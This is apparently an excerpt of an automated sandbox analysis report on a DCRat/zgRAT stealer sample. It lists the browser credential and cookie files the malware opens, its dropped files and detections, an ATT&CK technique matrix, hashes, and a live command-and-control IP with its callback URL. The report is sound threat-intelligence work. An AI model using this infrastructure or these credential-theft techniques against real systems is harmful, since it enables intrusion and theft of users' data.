                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior

                              Remote Access Functionality

                              Source: Yara match; File source: 00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: XNPOazHpXF.exe PID: 5688, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: services.exe PID: 1352, type: MEMORYSTR
                              Source: Yara match; File source: XNPOazHpXF.exe, type: SAMPLE
                              Source: Yara match; File source: 0.0.XNPOazHpXF.exe.fb0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara match; File source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, type: DROPPED
                              Source: Yara match; File source: C:\Recovery\conhost.exe, type: DROPPED
                              Source: Yara match; File source: C:\Windows\InputMethod\CHT\services.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 1 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 1 Scripting | 12 Process Injection | 232 Masquerading | 1 OS Credential Dumping | 331 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                              Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 261 Virtualization/Sandbox Evasion | Security Account Manager | 261 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 134 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Behavior Graph ID: 1579268, Sample: XNPOazHpXF.exe, Startdate: 21/12/2024, Architecture: WINDOWS, Score: 100
                              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 13 other signatures
                              XNPOazHpXF.exe (4, 48) started
                                Dropped: C:\Windows\InputMethod\CHT\services.exe, PE32; C:\Users\user\Desktop\xLaDTRLB.log, PE32; C:\Users\user\Desktop\udTfrDlO.log, PE32; 36 other malicious files
                                Signatures: Drops PE files with benign system names
                                cmd.exe (1) started
                                  Signatures: Uses ping.exe to sleep; Drops executables to the windows directory (C:\Windows) and starts them; Uses ping.exe to check the status of other devices and networks
                                  services.exe (14, 284) started
                                    DNS/IP: 89.23.96.180, 49714, 49721, 49724, MAXITEL-ASRU, Russian Federation
                                    Dropped: C:\Users\user\Desktop\yGSOdQVY.log, PE32; C:\Users\user\Desktop\wwvNdyqX.log, PE32; C:\Users\user\Desktop\wSNFrCZa.log, PE32; 24 other malicious files
                                    Signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc)
                                  conhost.exe started
                                  PING.EXE (1) started
                                  chcp.com (1) started

                              SourceDetectionScannerLabelLink
                              XNPOazHpXF.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              XNPOazHpXF.exe60%VirustotalBrowse
                              XNPOazHpXF.exe100%AviraHEUR/AGEN.1339906
                              XNPOazHpXF.exe100%Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\MpvkKZGd.log | 100% | Avira | TR/Agent.jbwuj |
C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | 100% | Avira | HEUR/AGEN.1339906 |
C:\Recovery\dllhost.exe | 100% | Avira | HEUR/AGEN.1339906 |
C:\Users\user\Desktop\BwIEkNWR.log | 100% | Avira | TR/AVI.Agent.updqb |
C:\Users\user\Desktop\QKKBSDQi.log | 100% | Avira | HEUR/AGEN.1362695 |
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | 100% | Avira | HEUR/AGEN.1339906 |
C:\Users\user\Desktop\KnJCpqCi.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Users\user\Desktop\SVgCSVvi.log | 100% | Avira | TR/AD.BitpyRansom.lcksd |
C:\Users\user\Desktop\BKAMFwmA.log | 100% | Avira | HEUR/AGEN.1300079 |
C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat | 100% | Avira | BAT/Delbat.C |
C:\Users\user\Desktop\MYoSwDMa.log | 100% | Avira | TR/AVI.Agent.updqb |
C:\Recovery\conhost.exe | 100% | Avira | HEUR/AGEN.1339906 |
C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | 100% | Joe Sandbox ML | |
C:\Recovery\dllhost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\QKKBSDQi.log | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\FsHliKMo.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\McDcppqu.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\KnJCpqCi.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\QgmbSWHW.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\BKAMFwmA.log | 100% | Joe Sandbox ML | |
C:\Users\user\Desktop\EvgdMKxt.log | 100% | Joe Sandbox ML | |
C:\Recovery\conhost.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\conhost.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\dllhost.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\BKAMFwmA.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\BwIEkNWR.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\DujMFNlM.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\EvgdMKxt.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\FsHliKMo.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\HhBLiJAA.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\HpleNtbG.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\IzFuDcGk.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\JedTEJPv.log | 29% | ReversingLabs | |
C:\Users\user\Desktop\KnJCpqCi.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\LozUEcuw.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\MYoSwDMa.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\McDcppqu.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\MpvkKZGd.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\PWGsgpUk.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\QKKBSDQi.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\QOfJDANU.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\QgmbSWHW.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\RdNjnWVR.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\SRRrZjRP.log | 3% | ReversingLabs | |
C:\Users\user\Desktop\SVgCSVvi.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy |
C:\Users\user\Desktop\TEZjEzBg.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\TuCjUNij.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\UbnsZBxQ.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Users\user\Desktop\WLWsZSvc.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\XMTJgPHI.log | 12% | ReversingLabs | |
C:\Users\user\Desktop\YwCJgfGU.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\cEzSCxAQ.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\dBbaXxPL.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\dxMPeMlr.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\fHiQeeRs.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\guqIJuAJ.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\hnCGlIml.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\hrRQfuPE.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\iSjOnjPm.log | 21% | ReversingLabs | |
C:\Users\user\Desktop\iosYAuez.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\jkgzQrBD.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\kdtxsFme.log | 9% | ReversingLabs | |
C:\Users\user\Desktop\kuAPHbgg.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\lQBpXVWv.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\naXqXoBw.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\oXyytoQr.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\olqGOXgZ.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy |
C:\Users\user\Desktop\piSOkXvU.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
C:\Users\user\Desktop\qWWWVlrS.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
C:\Users\user\Desktop\qeFoAUSY.log | 16% | ReversingLabs | |
C:\Users\user\Desktop\rbhxVUhT.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\sGFWWBqe.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\uMMNchrL.log | 25% | ReversingLabs | |
C:\Users\user\Desktop\udTfrDlO.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\wSNFrCZa.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\wwvNdyqX.log | 3% | ReversingLabs | |
C:\Users\user\Desktop\xLaDTRLB.log | 17% | ReversingLabs | |
C:\Users\user\Desktop\yGSOdQVY.log | 29% | ReversingLabs | Win32.Trojan.Generic |
C:\Windows\InputMethod\CHT\services.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              No Antivirus matches
                              No Antivirus matches
                              No Antivirus matches
                              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | services.exe | false | | high
https://duckduckgo.com/chrome_newtab | services.exe | false | | high
https://duckduckgo.com/ac/?q= | services.exe | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | services.exe | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | services.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | services.exe | false | | high
http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlon | services.exe | true | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | services.exe | false | | high
http://89.23.96.180 | services.exe | true | | unknown
https://www.ecosia.org/newtab/ | services.exe | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | XNPOazHpXF.exe, services.exe | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | services.exe | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
89.23.96.180 | unknown | Russian Federation | | 48687 | MAXITEL-ASRU | true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1579268
                                                        Start date and time:2024-12-21 10:46:12 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 21s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:XNPOazHpXF.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:ADAE028E0A5A72D219A02BB06D92241A.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@10/328@0/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63, 23.218.208.109
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:47:25 | API Interceptor | 849262x Sleep call for process: services.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
89.23.96.180 | 9FwQYJSj4N.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MAXITEL-ASRU | 9FwQYJSj4N.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 89.23.96.180
 | bPkG0wTVon.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233
 | itLDZwgFNE.exe | Get hash | malicious | Flesh Stealer | Browse | 89.23.100.233
 | 3gJQoqWpxb.bat | Get hash | malicious | Unknown | Browse | 89.23.100.233
 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | Browse | 89.23.100.42
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 89.23.100.42
 | 7fE6IkvYWf.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233
 | iGxCM2I5u9.exe | Get hash | malicious | Flesh Stealer | Browse | 89.23.100.233
 | T05Dk6G8fg.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233
 | 3K5MXGVOJE.exe | Get hash | malicious | Unknown | Browse | 89.23.100.233
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe | 9FwQYJSj4N.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe | 9FwQYJSj4N.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
C:\Recovery\conhost.exe | 9FwQYJSj4N.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (747), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):747
                                                              Entropy (8bit):5.897136999214371
                                                              Encrypted:false
                                                              SSDEEP:12:K1AHg/DkmFNJqxqnxQdDFjUEuJex6qTm2EyA1i/RHsI5RGU/PN6FOgO3g/lA9/we:+AAL5FNI8nxQdpmJepnEyx1RG5Y3g/+r
                                                              MD5:85A88B184F687D664F117E4F438B443C
                                                              SHA1:BC6EF07CE092B39663E01D63929E4BF97176C49E
                                                              SHA-256:2A5ABEC60081C8B8C04EBB911F94010E9764EE73E26A58A5F41752AF9B2F7820
                                                              SHA-512:BA6098DB07E72522B8964B4428FCE4C0C929D7DE569B46CF410B357A98D781159F8FBEE67E522DBA1573A2140AF7A2D078D89B6DF81A05C75CDB7CFDA650F1A1
                                                              Malicious:false
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Joe Sandbox View:
                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                              Reputation:low
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Joe Sandbox View:
                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (652), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):5.890466774539286
                                                              Encrypted:false
                                                              SSDEEP:12:5ZdUeyXKm7UqASO+6mCrhjWB5SwCW1pztIHmrTFJso/OTfmXkZjZAhgH:5TUVKQA9+6DUB5SwzlTFjWm+jZAha
                                                              MD5:2DBA4C12EE43C990B57153EBC895CDCA
                                                              SHA1:10231FDA3BA797B1E1CF9C7AA172FDDDA855AF6C
                                                              SHA-256:2E363BDA929F51ED3B197E0FDA8758396B22CDB99681F121683D5C8C47E409BE
                                                              SHA-512:86BC22336928F2ABDF0F4FDEA4AB8512507A7BB90ECF190542EDB819B9AF3EBD75836FBEAA402DBF19C3E6CBAB9CA4F52C024900F1D9E8953737915BF2E696E4
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (569), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):569
                                                              Entropy (8bit):5.885752845584327
                                                              Encrypted:false
                                                              SSDEEP:12:ApPywB0Ymw4cZGb6Apu+WCsagXjwLnrR83ZbbgC0venBk:aywS5w4c4fprWCs5jwLnrR83ZbFy
                                                              MD5:AD10BFFBE6CB75B8A438D441265C7699
                                                              SHA1:90E76CC7BE4CCB1D5FF8FBFD4E35DD983D4A746B
                                                              SHA-256:8662A30941DE4CF1BC89C115FD99D29017A854849B3DECC88450E24C9C471231
                                                              SHA-512:B156D3B01AE30F3E51956F5B9F1850ECAECE71FB2B064C1A582E0921BB5E4F3FD425FB7A602FE08BFA0BFC60273DAAFD567CA08BAC5D06991587B2981D786F9A
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (708), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):708
                                                              Entropy (8bit):5.895249866582535
                                                              Encrypted:false
                                                              SSDEEP:12:zH7A4r/Sfe+e4YdR5OaX0dFxK0xv+2cBV0BfEQ7TFOsKs2g8wQqJ:PrKm+05OT0QWHmBmO5J
                                                              MD5:E2CDF12153CE0707C1A22ECEBAC471AD
                                                              SHA1:4E300AA7833A47D38DB916538850F4F6D20F27EF
                                                              SHA-256:DAF1EFBF4538603DA51AFD17C1D005EC40EA36C3F061C68E5676AAFED4AC2183
                                                              SHA-512:C6393A314A5828316E38AC3FF742F82C43C07180D2F32264222A7992B83AA5C608B28E4793F0F3FBF6CFCAB676885D7CEBE4B532489707D2D6BBBF23E67F6DB1
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
